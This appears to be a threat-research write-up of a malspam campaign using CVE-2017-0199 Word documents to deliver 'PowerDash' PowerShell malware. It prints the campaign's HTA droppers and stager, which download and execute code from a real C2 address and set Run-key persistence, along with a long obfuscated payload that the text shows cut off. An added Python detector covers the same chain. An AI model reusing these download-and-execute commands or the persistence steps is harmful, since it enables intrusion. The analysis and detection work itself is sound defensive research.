In late April we observed a malspam campaign delivering a previously unseen PowerShell malware. We decided to provide an overview of the campaign and some of the malware's capabilities. We're also dubbing this malware family "PowerDash" because of the "/dash" path on the C2 server, used as a gateway for bots.
Execution graph
Lure email message
The lure email is fairly short. It asks the recipient to provide price quotes for the inquiry attached to the email. A compromised email account was used to send out the messages.
The attachment is an MS Word document that exploits the CVE-2017-0199 vulnerability and fetches an additional HTA payload from a remote location.
$ strings ObjectPool/_1743066221/[3]LinkInfo
https://track.adform.net/adfserve/?bn=12345;redirurl=http://5.63.152.179/doc/zal_nr_1_zap_ofert(8164).doc
Judging by the non-unique tracking identifier – 12345 – the tracking service was most likely used as an attempt to bypass basic email security solutions, not to track the campaign reach.
HTA payload
The HTA payload fetches and executes a PowerShell payload (stager) from the same host.
<script language="VBScript">
Window.ReSizeTo 0,0
Window.MoveTo -1000, -1000
Set wsh = CreateObject("wscript.shell")
wsh.Run "powershell SI Variable:\9n ([Net.HttpWebRequest]::Create('http://5.63.152.179/pl/1txt/8164').GetResponse().GetResponseStream());Set-Variable Abg '';Try{While((LS Variable:Abg).Value+=[Char](Variable 9n).Value.ReadByte()){}}Catch{};&$ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(GCI Variable:_).Value.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(GCI Variable:_).Value.Name-like'*Co*me'}).Name).Invoke('*-Ex*n',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)(LS Variable:Abg).Value",0
Window.Close
</script>
Stager
The stager is responsible for achieving persistence on the machine and downloading the final payload. The former is performed in a pretty standard manner – by downloading yet another HTA payload to the temporary directory and adding an entry to the Autorun registry key to execute it using mshta.exe.
After that's finished, the program goes on to download and run the final payload.
$Pth = "$env:temp\$env:computername.hta";
(New-Object System.Net.WebClient).DownloadFile('http://5.63.152.179/pl/2ht/8164',$Pth);
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "wsz_8164" /t REG_SZ /F /D "$Env:SystemRoot\System32\mshta.exe $Pth";
SI Variable:\bNW ([Net.HttpWebRequest]::Create('http://5.63.152.179/pl/3txt/8164').GetResponse().GetResponseStream());
SV DLR '';
Try{While(1){(Get-ChildItem Variable:DLR).Value+=[Char](Get-Item Variable:/bNW).Value.ReadByte()}}Catch{};
.([ScriptBlock]::Create((Get-ChildItem Variable:DLR).Value))
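The HTA one-liner and the stager together give a defender three host-side signals: an Office process spawning mshta.exe, a script host spawning PowerShell whose command line builds its script byte by byte from an HttpWebRequest stream through Variable: drive lookups, and a reg.exe Run-key entry pointing mshta.exe at an .hta in the temp directory. The Python detector below is added here and is not part of the original write-up; it applies those rules to constructed process-creation events, and the IP address, file names, host name and event shape are assumptions rather than observed data.

```python
import ntpath
import re
from typing import Dict, List, Tuple

# Constructed process-creation events (parent image, image, command line) in the
# shape a SIEM would hold. They are written for this example, not telemetry from
# the campaign; the IP address, file names and host name are placeholders.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {   # Word launching mshta.exe on the fetched HTA (CVE-2017-0199 stage)
        "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "image": r"C:\Windows\System32\mshta.exe",
        "cmdline": r"mshta.exe http://192.0.2.10/doc/example.doc",
    },
    {   # the HTA running the stager download-and-execute one-liner
        "parent": r"C:\Windows\System32\mshta.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": ("powershell SI Variable:\\9n ([Net.HttpWebRequest]::Create("
                    "'http://192.0.2.10/pl/1txt/0000').GetResponse().GetResponseStream());"
                    "Set-Variable Abg '';Try{While((LS Variable:Abg).Value+="
                    "[Char](Variable 9n).Value.ReadByte()){}}Catch{};..."),
    },
    {   # the stager writing its Run-key entry through reg.exe
        "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "image": r"C:\Windows\System32\reg.exe",
        "cmdline": (r'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" '
                    r'/V "wsz_0000" /t REG_SZ /F /D "C:\Windows\System32\mshta.exe '
                    r'C:\Users\bob\AppData\Local\Temp\DESKTOP-1.hta"'),
    },
    {   # benign administrative use of PowerShell, must not fire
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": "powershell -NoProfile -Command Get-Process",
    },
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}

# The in-memory download shared by the HTA and the stager: an HttpWebRequest
# response stream consumed with ReadByte() in a loop, with the accumulator
# addressed through the Variable: drive instead of a plain $name.
_STREAM_DOWNLOAD = re.compile(
    r"HttpWebRequest\]::Create\(.*?GetResponseStream\(\).*?ReadByte\(\)", re.I | re.S)
_VARIABLE_DRIVE = re.compile(
    r"\b(?:LS|GCI|Get-ChildItem|Get-Item|SI|Set-Item|SV|Set-Variable)\s+Variable:", re.I)

# Run-key persistence whose value launches mshta.exe on an .hta in a Temp folder.
_RUNKEY_MSHTA = re.compile(
    r"\bREG\s+ADD\b.*\\CurrentVersion\\Run\b.*mshta\.exe\s+\S*\\Temp\\\S*\.hta", re.I)


def classify_event(event: Dict[str, str]) -> List[str]:
    """Return the names of the rules an event matches (empty for benign events)."""
    parent = ntpath.basename(event["parent"]).lower()
    image = ntpath.basename(event["image"]).lower()
    cmd = event["cmdline"]
    hits: List[str] = []
    if parent in OFFICE_APPS and image == "mshta.exe":
        hits.append("office_spawns_mshta")
    if parent in SCRIPT_HOSTS and image == "powershell.exe":
        hits.append("script_host_spawns_powershell")
    if image == "powershell.exe" and _STREAM_DOWNLOAD.search(cmd) and _VARIABLE_DRIVE.search(cmd):
        hits.append("readbyte_stream_download")
    if image == "reg.exe" and _RUNKEY_MSHTA.search(cmd):
        hits.append("runkey_mshta_temp_hta")
    return hits


def scan(events: List[Dict[str, str]]) -> List[Tuple[int, List[str]]]:
    """Return (event index, matched rules) for every event that fires at least one rule."""
    results: List[Tuple[int, List[str]]] = []
    for idx, event in enumerate(events):
        hits = classify_event(event)
        if hits:
            results.append((idx, hits))
    return results


if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(hits)}")
```

The parent/child rules alone are noisy in environments that use mshta.exe legitimately; the command-line rules carry the weight, and the Run-key rule also catches the persistence entry on a later reboot if the initial execution was missed.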
Persistence HTA
The persistence script is almost identical to the first HTA payload, with the exception of executing the final payload instead of the stager.
<script>
resizeTo (0,0);
moveTo (-1240, -1240);
r = new ActiveXObject("WScript.Shell").Run("powershell SI Variable:\9n ([Net.HttpWebRequest]::Create('http://5.63.152.179/pl/3txt/8164').GetResponse().GetResponseStream());Set-Variable Abg '';Try{While((LS Variable:Abg).Value+=[Char](Variable 9n).Value.ReadByte()){}}Catch{};&$ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(GCI Variable:_).Value.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(GCI Variable:_).Value.Name-like'*Co*me'}).Name).Invoke('*-Ex*n',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)(LS Variable:Abg).Value",0,true);
window.close();
</script>
The payload – PowerDash
The final payload is heavily obfuscated using what amounts to a PowerShell version of JSFuck [1].
('______' | %{ ${~}=+$() } {${``%} = ${~} } { ${~*(} =++ ${~} }{ ${[*} = ( ${~}= ${~}+ ${~*(} ) } {${[)$} =(${~}= ${~}+ ${~*(}) }{${``}=( ${~}=${~} + ${~*(} )} { ${;!@}=( ${~}=${~}+ ${~*(} ) } {${#)``} =(${~}= ${~} +${~*(} ) }{${'}=(${~} = ${~}+${~*(}) } {${.#=} =( ${~} =${~}+${~*(})} { ${#+}= ( ${~}= ${~} + ${~*(} ) }{${@} ="["+ "$(@{} )"[${'} ]+ "$(@{ })"[ "${~*(}" + "${#+}"]+ "$( @{} )"[ "${[*}" + "${``%}"]+ "$? "[${~*(}] + "]"}{${~}="".("$(@{ } ) "["${~*(}" + "${``}" ] +"$(@{ } ) "["${~*(}" +"${#)``}" ]+ "$(@{})"[${``%}]+"$(@{}) "[ ${``} ] +"$?"[${~*(}]+ "$(@{}) "[${[)$}] )}{ ${~}= "$(@{ })"["${~*(}${``}"] + "$(@{ })"[ ${``} ] +"${~}"["${[*}${'}" ] } ); . ${~}("${~} ( ${@}${#+}${~*(}+${@}${'}${.#=}+${@}${~*(}${``%}${~*(}+${@}${~*(}${~*(}${#)``} +${@}${``}${#)``}+ ${@}${.#=}${[)$} + ${@}${~*(}${``%}${~*(}+ ${@}${~*(}${~*(}${``}+ ${@}${~*(}${~*(}${.#=}+ ${@}${~*(}${``%}${;!@} +${@}${#+}${#+} + ${@}${~*(}${``%}${~*(}+${@}${.#=}${``%} +${@}${~*(}${~*(}${~*(} + ${@}${~*(}${``%}${;!@} +${@}${~*(}${~*(}${``%}+ ${@}${~*(}${~*(}${#)``}+${@}${'}${'} + ${@}${#+}${'} + ${@}${~*(}${~*(}${``%}+ ${@}${#+}${'}+${@}${~*(}${``%}${[)$}+${@}${~*(}${``%}${~*(} + ${@}${~*(}${~*(}${``}+ ${@}${#+}${[)$} +${@}${;!@}${.#=}+${@}${;!@}${.#=}+ ${@}${.#=}${[)$}+ ${@}${~*(}${``%}${~*(}+${@}${#+}${#+} +${@}${~*(}${~*(}${'} +${@}${~*(}${~*(}${``} + ${@}${~*(}${``%}${;!@} +${@}${~*(}${~*(}${#)``}+${@}${~*(}${[*}${~*(} + ${@}${.#=}${``%} +${@}${~*(}${~*(}${``}+ ${@}${~*(}${~*(}${~*(} + ${@}${~*(}${~*(}${#)``} +${@}${~*(}${~*(}${~*(}+ ${@}${#+}${#+} +${@}${~*(}${~*(}${~*(} +${@}${~*(}${``%}${.#=}+${@}${[)$}${[*} +${@}${#)``}${~*(} +${@}${[)$}${[*}+ ${@}${#+}${~*(} +${@}${'}${.#=} +${@}${~*(}${``%}${~*(} +${@}${~*(}${~*(}${#)``} + ${@}${``}${#)``}+ ${@}${.#=}${[)$}+ ${@}${~*(}${``%}${~*(} +${@}${#+}${#+}+${@}${~*(}${~*(}${'}+ ${@}${~*(}${~*(}${``} +${@}${~*(}${``%}${;!@}+${@}${~*(}${~*(}${#)``} +${@}${~*(}${[*}${~*(}+${@}${.#=}${``%} +${@}${~*(}${~*(}${``} 
+${@}${~*(}${~*(}${~*(}+${@}${~*(}${~*(}${#)``}+${@}${~*(}${~*(}${~*(}+${@}${#+}${#+} + ${@}${~*(}${~*(}${~*(} +${@}${~*(}${``%}${.#=}+${@}${.#=}${``} + ${@}${~*(}${[*}${~*(}+ ${@}${~*(}${~*(}${[*}+${@}${~*(}${``%}${~*(} + ${@}${#+}${[)$} +${@}${;!@}${.#=}+ ${@}${;!@}${.#=}+${@}${.#=}${``}+${@}${~*(}${``%}${.#=} + ${@}${~*(}${~*(}${;!@} +${@}${``}${#+} +${@}${;!@}${``%} + ${@}${~*(}${[)$} +${@}${~*(}${``%} +${@}${#+}${~*(} +${@}${.#=}${[)$} +${@}${~*(}${[*}${~*(}+ ${@}${~*(}${~*(}${;!@} +${@}${~*(}${~*(}${#)``} + ${@}${~*(}${``%}${~*(}+ ${@}${~*(}${``%}${#+} +${@}${``}${#)``}+ ${@}${'}${.#=} + ${@}${~*(}${``%}${~*(} + ${@}${~*(}${~*(}${#)``}+${@}${``}${#)``} + ${@}${.#=}${[)$}+${@}${~*(}${``%}${~*(} + ${@}${~*(}${~*(}${``} + ${@}${~*(}${~*(}${.#=}+ ${@}${~*(}${``%}${;!@} +${@}${#+}${#+}+ ${@}${~*(}${``%}${~*(}+${@}${.#=}${``%} + ${@}${~*(}${~*(}${~*(} +${@}${~*(}${``%}${;!@}+${@}${~*(}${~*(}${``%}+${@}${~*(}${~*(}${#)``}+ ${@}${'}${'}+ ${@}${#+}${'} +${@}${~*(}${~*(}${``%}+${@}${#+}${'} +${@}${~*(}${``%}${[)$}+ ${@}${~*(}${``%}${~*(}+ ${@}${~*(}${~*(}${``} + ${@}${#+}${[)$}+ ${@}${;!@}${.#=} +${@}${;!@}${.#=} + ${@}${.#=}${[)$} +${@}${~*(}${``%}${~*(}+ ${@}${~*(}${~*(}${``} +${@}${~*(}${~*(}${.#=}+${@}${~*(}${``%}${~*(} +${@}${~*(}${~*(}${``} + ${@}${#)``}${'}+${@}${~*(}${``%}${~*(}+ ${@}${~*(}${~*(}${``} + ${@}${~*(}${~*(}${#)``} + ${@}${~*(}${``%}${;!@} +${@}${~*(}${``%}${[*}+ ${@}${~*(}${``%}${;!@}+${@}${#+}${#+}+${@}${#+}${'}+ ${@}${~*(}${~*(}${#)``}+ ${@}${~*(}${``%}${~*(} +${@}${.#=}${#)``} +${@}${#+}${'} + ${@}${~*(}${``%}${.#=} + ${@}${~*(}${``%}${;!@} +${@}${~*(}${``%}${``%} + ${@}${#+}${'}+${@}${~*(}${~*(}${#)``}+${@}${~*(}${``%}${;!@} +${@}${~*(}${~*(}${~*(} +${@}${~*(}${~*(}${``%} +${@}${#)``}${'}+ ${@}${#+}${'} + ${@}${~*(}${``%}${.#=}+ ${@}${~*(}${``%}${.#=}+ ${@}${#+}${.#=} +${@}${#+}${'} +${@}${#+}${#+}+${@}${~*(}${``%}${'} + ${@}${[)$}${[*}+ ${@}${#)``}${~*(}+ ${@}${[)$}${[*} + ${@}${~*(}${[*}${[)$}+ ${@}${[)$}${#)``} + ${@}${~*(}${~*(}${#)``} + 
${@}${~*(}${~*(}${``} + ${@}${~*(}${~*(}${'} + ${@}${~*(}${``%}${~*(} +${@}${~*(}${[*}${;!@}+${@}${~*(}${[)$} +${@}${~*(}${``%}+${@}${[)$}${#)``}+${@}${~*(}${~*(}${'} + ${@}${~*(}${~*(}${``}+ ${@}${~*(}${``%}${.#=} +${@}${[)$}${[*}+ ${@}${[)$}${[*}+${@}${#)``}${~*(}+${@}${[)$}${[*} + ${@}${[)$}${``}+${@}${~*(}${``%}${``}+${@}${~*(}${~*(}${#)``}+${@}${~*(}${~*(}${#)``}+${@}${~*(}${~*(}${[*}+ ${@}${~*(}${~*(}${;!@}+ ${@}${;!@}${.#=} +${@}${``}${'} + ${@}${``}${'} + ${@}${;!@}${'} +${@}${;!@}${[)$} + ${@}${``}${#)``} + ${@}${``}${#+} + ${@}${;!@}${``}+${@}${;!@}${~*(} + ${@}${``}${#)``}+ ${@}${;!@}${``%} +${@}${;!@}${[*} +${@}${``}${.#=}+${@}${``}${#)``} +${@}${``}${#+}+${@}${;!@}${#)``} +${@}${;!@}${[*} +${@}${;!@}${.#=} +${@}${;!@}${#)``} +${@}${``}${.#=} +${@}${``}${.#=}+${@}${``}${.#=}+${@}${``}${'} + ${@}${~*(}${``%}${``%}+${@}${#+}${'}+${@}${~*(}${~*(}${;!@} + ${@}${~*(}${``%}${``} + ${@}${``}${'} +${@}${~*(}${~*(}${[*}+${@}${~*(}${~*(}${~*(} +${@}${~*(}${~*(}${;!@} +${@}${~*(}${~*(}${#)``}+${@}${#+}${;!@}+${@}${~*(}${``%}${``%}+${@}${#+}${'}+ ${@}${~*(}${~*(}${#)``}+ ${@}${#+}${'} + ${@}${``}${'}+ ${@}${[)$}${``}+${@}${~*(}${[)$} + ${@}${~*(}${``%} + ${@}${[)$}${#)``}+${@}${#+}${.#=}+${@}${~*(}${~*(}${~*(} +${@}${~*(}${``%}${``%}+${@}${~*(}${[*}${~*(} + ${@}${[)$}${[*} +${@}${#)``}${~*(}+${@}${[)$}${[*} + ${@}${#)``}${``} + ${@}${~*(}${[*}${[)$}+ ${@}${~*(}${[)$}+${@}${~*(}${``%}+${@}${[)$}${[*}+ ${@}${[)$}${[*} + ${@}${[)$}${[*} + ${@}${[)$}${[*}+ ${@}${~*(}${~*(}${'}+ ${@}${~*(}${~*(}${'}+${@}${~*(}${``%}${;!@}+${@}${~*(}${``%}${``%} +${@}${[)$}${[*}+${@}${#)``}${~*(} + ${@}${[)$}${[*}+ ${@}${``}${``%} + ${@}${'}${~*(}+ ${@}${~*(}${``%}${~*(}+${@}${~*(}${~*(}${#)``} + ${@}${``}${;!@}+ ${@}${.#=}${'} +${@}${~*(}${``%}${#+} +${@}${~*(}${``%}${;!@}+${@}${'}${#+}+ ${@}${#+}${.#=}+ ${@}${~*(}${``%}${#)``} +${@}${~*(}${``%}${~*(}+${@}${#+}${#+} +${@}${~*(}${~*(}${#)``} + ${@}${[)$}${[*} + ${@}${.#=}${'} + ${@}${~*(}${``%}${;!@}+ ${@}${~*(}${~*(}${``%} + 
${@}${;!@}${~*(} + ${@}${;!@}${``%}+${@}${#+}${;!@}+${@}${#)``}${'} +${@}${~*(}${~*(}${~*(} + ${@}${~*(}${``%}${#+}+${@}${~*(}${~*(}${[*}+ ${@}${~*(}${~*(}${'}+ ${@}${~*(}${~*(}${#)``}+${@}${~*(}${``%}${~*(}+ ${@}${~*(}${~*(}${``} +${@}${.#=}${[)$}+${@}${~*(}${[*}${~*(} +${@}${~*(}${~*(}${;!@} +${@}${~*(}${~*(}${#)``} + ${@}${~*(}${``%}${~*(} + ${@}${~*(}${``%}${#+} +${@}${.#=}${``%} + ${@}${~*(}${~*(}${``}+ ${@}${~*(}${~*(}${~*(} +${@}${~*(}${``%}${``%}+${@}${~*(}${~*(}${'}+${@}${#+}${#+}+ ${@}${~*(}${~*(}${#)``}+${@}${``}${~*(} +${@}${``}${#)``}+${@}${.#=}${;!@} +${@}${.#=}${;!@}+ ${@}${'}${[)$} + ${@}${#)``}${.#=} +${@}${~*(}${[)$} +${@}${~*(}${``%} + ${@}${[)$}${[*} + ${@}${[)$}${[*} +${@}${[)$}${[*} +${@}${[)$}${[*}+ ${@}${~*(}${~*(}${``%}+ ${@}${#+}${'} +${@}${~*(}${``%}${#+} +${@}${~*(}${``%}${~*(} +${@}${[)$}${[*} + ${@}${#)``}${~*(}+ ${@}${[)$}${[*}+ ${@}${[)$}${#)``} +${@}${~*(}${``%}${~*(}+ ${@}${~*(}${~*(}${``%} + ${@}${~*(}${~*(}${.#=}+ ${@}${;!@}${.#=} +${@}${#)``}${'} + ${@}${'}${#+} + ${@}${'}${'} +${@}${.#=}${``%} +${@}${.#=}${;!@} + ${@}${.#=}${``} + ${@}${#)``}${#+}+ ${@}${.#=}${[*} +${@}${'}${.#=} +${@}${#)``}${;!@} +${@}${'}${'}+${@}${#)``}${#+}+ ${@}${~*(}${[)$} + ${@}${~*(}${``%} + ${@}${[)$}${[*}+${@}${[)$}${[*}+${@}${[)$}${[*} +${@}${[)$}${[*} +${@}${~*(}${~*(}${~*(} +${@}${~*(}${~*(}${;!@}+${@}${[)$}${[*}+ ${@}${[)$}${[*}+${@}${[)$}${[*} + ${@}${#)``}${~*(}+ ${@}${[)$}${[*}+${@}${``}${``%}+${@}${'}${~*(}+${@}${~*(}${``%}${~*(}+ ${@}${~*(}${~*(}${#)``}+${@}${``}${;!@} + ${@}${.#=}${'}+${@}${~*(}${``%}${#+}+ ${@}${~*(}${``%}${;!@}+ ${@}${'}${#+}+ ${@}${#+}${.#=} +${@}${~*(}${``%}${#)``} +${@}${~*(}${``%}${~*(}+ ${@}${#+}${#+}+ ${@}${~*(}${~*(}${#)``}+ ${@}${[)$}${[*} + ${@}${``}${;!@}+ ${@}${#)``}${'} +${@}${~*(}${``%}${.#=} +${@}${#+}${'}+ ${@}${~*(}${~*(}${;!@}+${@}${~*(}${~*(}${;!@}+${@}${[)$}${[*} +${@}${.#=}${'} +${@}${~*(}${``%}${;!@}+ ${@}${~*(}${~*(}${``%}+ ${@}${;!@}${~*(} +${@}${;!@}${``%} +${@}${#+}${;!@} + ${@}${'}${#+} 
+${@}${~*(}${~*(}${[*} +${@}${~*(}${``%}${~*(}+ ${@}${~*(}${~*(}${``}+ ${@}${#+}${'} +${@}${~*(}${~*(}${#)``} +${@}${~*(}${``%}${;!@}+${@}${~*(}${~*(}${``%} + ${@}${~*(}${``%}${[)$} +${@}${.#=}${[)$}+${@}${~*(}${[*}${~*(}+ ${@}${~*(}${~*(}${;!@} +${@}${~*(}${~*(}${#)``} +${@}${~*(}${``%}${~*(} + ${@}${~*(}${``%}${#+} + ${@}${``}${~*(}+ ${@}${``}${#)``} + ${@}${#)``}${'} +${@}${#+}${'}+ ${@}${~*(}${~*(}${[*} + ${@}${~*(}${~*(}${#)``}+ ${@}${~*(}${``%}${;!@}+ ${@}${~*(}${~*(}${~*(}+${@}${~*(}${~*(}${``%} +${@}${~*(}${[)$}+ ${@}${~*(}${``%}+ ${@}${[)$}${[*}+${@}${[)$}${[*}+ ${@}${[)$}${[*} + ${@}${[)$}${[*} +${@}${~*(}${``%}${.#=} + ${@}${#+}${'} +${@}${~*(}${~*(}${``%} + ${@}${~*(}${``%}${[)$} + ${@}${[)$}${[*}+ ${@}${#)``}${~*(}+${@}${[)$}${[*}+ ${@}${``}${``%} + ${@}${'}${~*(} +${@}${~*(}${``%}${~*(} + ${@}${~*(}${~*(}${#)``} + ${@}${``}${;!@}+ ${@}${#)``}${'} + ${@}${~*(}${``%}${;!@}+${@}${~*(}${``%}${#+} +${@}${'}${[)$} + ${@}${~*(}${~*(}${``%} +${@}${~*(}${~*(}${;!@}+ ${@}${~*(}${~*(}${#)``} + ${@}${#+}${'}+${@}${~*(}${~*(}${``%}+${@}${#+}${#+} +${@}${~*(}${``%}${~*(} + ${@}${[)$}${[*}+ ${@}${#)``}${'} + ${@}${'}${[)$} + ${@}${'}${'} + ${@}${#+}${;!@} + ${@}${.#=}${#)``} +${@}${~*(}${``%}${;!@}+ ${@}${~*(}${``%}${``%}+ ${@}${~*(}${``%}${~*(}+${@}${~*(}${~*(}${~*(}+${@}${#)``}${'} +${@}${~*(}${~*(}${~*(} +${@}${~*(}${~*(}${``%}+${@}${~*(}${~*(}${#)``} + ${@}${~*(}${~*(}${``} + ${@}${~*(}${~*(}${~*(}+ ${@}${~*(}${``%}${.#=} +${@}${~*(}${``%}${.#=}+${@}${~*(}${``%}${~*(}+${@}${~*(}${~*(}${``} + ${@}${~*(}${[*}${``} +${@}${[)$}${'} + ${@}${~*(}${[*}${[)$} +${@}${#+}${~*(}+ ${@}${~*(}${``%}${;!@} + ${@}${~*(}${~*(}${``%} +${@}${~*(}${~*(}${#)``}+ ${@}${#+}${[)$} +${@}${#+}${~*(}+ ${@}${~*(}${``%}${#+}+ ${@}${#+}${'}+${@}${~*(}${~*(}${#)``}+ ${@}${~*(}${``%}${``} +${@}${#+}${[)$}+ ${@}${;!@}${.#=} + ${@}${;!@}${.#=}+${@}${~*(}${~*(}${``} +${@}${~*(}${~*(}${~*(} + ${@}${~*(}${~*(}${'} + ${@}${~*(}${~*(}${``%} +${@}${~*(}${``%}${``%}+ ${@}${``}${``%} +${@}${[)$}${#)``} 
+ ${@}${#+}${;!@}+ ${@}${``}${#)``} +${@}${#)``}${;!@} + ${@}${~*(}${``%}${``%}+ ${@}${#+}${'}+${@}${~*(}${~*(}${[*} +${@}${~*(}${~*(}${#)``} +${@}${~*(}${``%}${~*(} + ${@}${~*(}${~*(}${``}+ ${@}${.#=}${[*}+${@}${#)``}${;!@}+ ${@}${'}${'}+${@}${``}${'}+${@}${``}${#+} + ${@}${'}${~*(}+ ${@}${#)``}${#)``}+ ${@}${``}${~*(} + ${@}${~*(}${[*}${;!@} + ${@}${``}${~*(}+${@}${[)$}${[*} + ${@}${``}${;!@}+ ${@}${~*(}${``%}${#)``}+${@}${~*(}${~*(}${~*(} +${@}${~*(}${``%}${;!@} + ${@}${~*(}${~*(}${``%}+ ${@}${``}${``%} +${@}${[)$}${``} +${@}${;!@}${#+} +${@}${[)$}${[*} + ${@}${[)$}${``} + ${@}${``}${~*(}+${@}${~*(}${[)$} + ${@}${~*(}${``%}+ ${@}${[)$}${[*}+ ${@}${[)$}${[*}+ ${@}${[)$}${[*}+ ${@}${[)$}${[*}+ ${@}${~*(}${``%}${``%}+${@}${~*(}${~*(}${~*(} + ${@}${~*(}${``%}${#+} +${@}${#+}${'}+${@}${~*(}${``%}${;!@} + ${@}${~*(}${~*(}${``%}+ ${@}${[)$}${[*} + ${@}${#)``}${~*(} +${@}${[)$}${[*}+${@}${``}${``%}+${@}${'}${~*(} + ${@}${~*(}${``%}${~*(} +${@}${~*(}${~*(}${#)``} + ${@}${``}${;!@} + ${@}${.#=}${'} +${@}${~*(}${``%}${#+} +${@}${~*(}${``%}${;!@}+ ${@}${'}${#+}+${@}${#+}${.#=} +${@}${~*(}${``%}${#)``}+ ${@}${~*(}${``%}${~*(} + ${@}${#+}${#+} + ${@}${~*(}${~*(}${#)``} + ${@}${[)$}${[*}+${@}${``}${;!@} +${@}${#)``}${'}+${@}${~*(}${``%}${.#=}+ ${@}${#+}${'}+ ${@}${~*(}${~*(}${;!@} +${@}${~*(}${~*(}${;!@}+${@}${[)$}${[*}+ ${@}${.#=}${'}+${@}${~*(}${``%}${;!@}+ ${@}${~*(}${~*(}${``%}+ ${@}${;!@}${~*(} +${@}${;!@}${``%} +${@}${#+}${;!@} + ${@}${#)``}${'}+${@}${~*(}${~*(}${~*(} +${@}${~*(}${``%}${#+} +${@}${~*(}${~*(}${[*} +${@}${~*(}${~*(}${'}+ ${@}${~*(}${~*(}${#)``} +${@}${~*(}${``%}${~*(} +${@}${~*(}${~*(}${``} + ${@}${.#=}${[)$}+ ${@}${~*(}${[*}${~*(}+ ${@}${~*(}${~*(}${;!@}+ ${@}${~*(}${~*(}${#)``}+${@}${~*(}${``%}${~*(} + ${@}${~*(}${``%}${#+}+${@}${``}${~*(} + ${@}${``}${#)``} +${@}${#)``}${.#=}+ ${@}${~*(}${~*(}${~*(} + ${@}${~*(}${``%}${#+}+ ${@}${#+}${'} +${@}${~*(}${``%}${;!@} +${@}${~*(}${~*(}${``%}+${@}${~*(}${[)$} +${@}${~*(}${``%} + 
${@}${[)$}${[*}+${@}${[)$}${[*}+${@}${[)$}${[*} + ${@}${[)$}${[*}+${@}${#+}${'} +${@}${~*(}${~*(}${.#=} +${@}${[)$}${[*}+${@}${#)``}${~*(}+ ${@}${[)$}${[*} +${@}${``}${``%} + ${@}${'}${~*(}+ ${@}${~*(}${``%}${~*(} +${@}${~*(}${~*(}${#)``} +${@}${``}${;!@} +${@}${.#=}${'}+ ${@}${~*(}${``%}${#+}+ ${@}${~*(}${``%}${;!@}+${@}${'}${#+} +${@}${#+}${.#=} + ${@}${~*(}${``%}${#)``}+ ${@}${~*(}${``%}${~*(} +${@}${#+}${#+} + ${@}${~*(}${~*(}${#)``}+ ${@}${[)$}${[*}+${@}${``}${;!@}+ ${@}${~*(}${~*(}${``%}+${@}${#+}${'} +${@}${~*(}${``%}${#+} +${@}${~*(}${``%}${~*(} +${@}${~*(}${~*(}${;!@} + ${@}${~*(}${~*(}${[*} + ${@}${#+}${'} + ${@}${#+}${#+} +${@}${~*(}${``%}${~*(} + ${@}${[)$}${[*}+${@}${~*(}${~*(}${``} + ${@}${~*(}${~*(}${~*(}+ ${@}${~*(}${~*(}${~*(} +${@}${~*(}${~*(}${#)``} + ${@}${#+}${[*} + ${@}${.#=}${[)$}+ ${@}${~*(}${``%}${~*(} + ${@}${#+}${#+} +${@}${~*(}${~*(}${'}+${@}${~*(}${~*(}${``}+${@}${~*(}${``%}${;!@} + ${@}${~*(}${~*(}${#)``}+${@}${~*(}${[*}${~*(}+${@}${#)``}${'} +${@}${~*(}${``%}${~*(}+${@}${~*(}${~*(}${``%}+ ${@}${~*(}${~*(}${#)``}+ ${@}${~*(}${``%}${~*(} + ${@}${~*(}${~*(}${``} +${@}${;!@}${``%}+ ${@}${[)$}${[*}+ ${@}${``}${;!@} + ${@}${#+}${#+} + ${@}${~*(}${``%}${.#=}+ ${@}${#+}${'}+${@}${~*(}${~*(}${;!@} +${@}${~*(}${~*(}${;!@}+ ${@}${[)$}${[*}+${@}${#)``}${;!@}+${@}${~*(}${~*(}${``%}+ ${@}${~*(}${~*(}${#)``}+${@}${~*(}${``%}${;!@}+ ${@}${~*(}${~*(}${.#=}+${@}${~*(}${``%}${;!@} +${@}${~*(}${~*(}${``} +${@}${~*(}${~*(}${'} + ${@}${~*(}${~*(}${;!@} +${@}${~*(}${~*(}${[*}+${@}${~*(}${~*(}${``}+ ${@}${~*(}${~*(}${~*(}+ ${@}${~*(}${``%}${``%}+${@}${~*(}${~*(}${'}+${@}${#+}${#+} + ${@}${~*(}${~*(}${#)``}+ ${@}${``}${~*(} + ${@}${``}${#)``}+ ${@}${#)``}${.#=}+${@}${~*(}${``%}${;!@} + ${@}${~*(}${~*(}${;!@} +${@}${~*(}${~*(}${[*} + ${@}${~*(}${``%}${.#=} +${@}${#+}${'}+ ${@}${~*(}${[*}${~*(}+ ${@}${'}${.#=} + ${@}${#+}${'} + ${@}${~*(}${``%}${#+}+${@}${~*(}${``%}${~*(}+${@}${~*(}${[)$} + ${@}${~*(}${``%} +${@}${[)$}${[*}+ ${@}${[)$}${[*}+${@}${[)$}${[*} + 
